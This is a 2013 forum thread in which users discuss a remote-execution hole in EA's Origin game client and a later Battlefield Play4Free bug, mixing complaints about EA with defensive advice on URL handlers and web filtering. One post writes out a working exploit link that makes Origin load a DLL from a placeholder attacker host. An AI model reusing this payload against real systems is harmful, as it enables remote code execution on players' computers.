Rawns Posted March 19, 2013 Posted March 19, 2013 BBC News - Players at risk from game store hack attack I hate origin. I reluctantly caved and installed it to play Battlefield 3. Wish I never bothered now.
X-13 Posted March 19, 2013 Posted March 19, 2013 The funny things is... Steam had this exact problem a while back. [Which was fixed pretty quickly.] EA didn't even bother to check if it was possible with Origin, based on their remote launch method being a copy of Steam's, and pre-patch it.
Sunnyknight Posted March 19, 2013 Posted March 19, 2013 EA That label is being hated more and more everyday. Won't be long before a group of people (no names, they're completely anonymous) may vent their frustration out on them.
X-13 Posted March 19, 2013 Posted March 19, 2013 Won't be long before a group of people (no names, they're completely anonymous) may vent their frustration out on them. I heard they don't forgive. They also, allegedly, don't forget and you should expect them. There's also a rumour they're in it for "teh lulz".
SovietRussia Posted March 19, 2013 Posted March 19, 2013 Great. At least I had Battlefield 3 for Free as I was a SimCity disaster case.
Sunnyknight Posted March 19, 2013 Posted March 19, 2013 I heard they don't forgive. They also, allegedly, don't forget and you should expect them. There's also a rumour they're in it for "teh lulz". Who knows, all i know is, respect who they are or face the consequences! @SovietRussia I pulled out DS3 BF3 = too many bugs
CAM Posted March 19, 2013 Posted March 19, 2013 I'm guessing it's related to crafting an Origin:// link pointing to something nasty and Origin executes it automatically without warning?
Geoff Posted March 19, 2013 Posted March 19, 2013 (edited) Yes, if something registers as a URL handler then the browser (depends) will prompt you what you want to happen the first time you click such a link. Most people don't read what they are being told and worse click the 'always do this for links like this' too. At which point the URL handler has basically the same level of access as a browser plugin. I don't imagine it'll be a big deal in most school environments but more generally I think you should pull up an 'average' machine and just check what url handlers you have installed (Java I'm looking at you). There's also scope for your web filter picking up 'odd' URL links. Some one like @tom_newton would know more I imagine. Edited March 19, 2013 by Geoff
X-13 Posted March 19, 2013 Posted March 19, 2013 I'm guessing it's related to crafting an Origin:// link pointing to something nasty and Origin executes it automatically without warning? Sort of. origin://LaunchGame/71503?CommandParams= -openautomate [url="file://\\ATTACKER_IP\evil.dll"]\\ATTACKER_IP\evil.dll [/url] ^ That would download a DLL from a remote location without your input. But, it could [i think] me modified to do pretty much anything. Especially, if you set it to download a lot of malicious files and a script to run them.
Garacesh Posted March 20, 2013 Posted March 20, 2013 There is no evidence the loophole has yet been used by malicious hackers. But for how long, now that it's out, 'eh? I think I have an origin account. Think. I had one of the BF games, can't remember which. Don't play it much anyway. Honestly I haven't bought anything EA in a while. Not because of any boycotts, just because I haven't xD
Yeo695 Posted March 20, 2013 Posted March 20, 2013 Though i did get a free copy of Dead Space 3 for putting up with Sim City and a Free copy of BF3 from AMD card i bought a while back. EA is like drugs to me. They make a few good games that I love to play (BF3, Tomb Raider, Sim City) but buying them and supporting them is destroying my humanity. The gaming community really needs to protest this but I know it will never happen
tom_newton Posted March 20, 2013 Posted March 20, 2013 The only way to catch these in filtering is actually to look in-page (possible with your smoothie!) it's computationally cheap to "block any page containing origin://" - much more expensive to "find and replace" it out. Either is possible, but be kind to your CPU and use the "block" method O course by the time someone clicks the link, all bets are off, as the handler needn't obey proxy rules.
Arthur Posted March 23, 2013 Posted March 23, 2013 Here's a new one... Bug in EA's Battlefield Play4Free allows attackers to hijack players' PCs « Ars Technica The ReVuln researchers identified the root cause of the vulnerability as the way Play4Free invokes an update mechanism. It allows attackers to use the CreateProcessW Windows API to inject a series of variables into commands that allows them to override the whitelist protection. The end result is the ability to upload a batch file to the Windows startup folder of vulnerable machines. The file is automatically executed the next time the computer is rebooted, and depending on its contents, it can install a host of malicious software. Obviously only any issue if you play Battlefield P4F on Windows XP. At this point, you deserve what you get if you are playing games on such an old operating system.
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now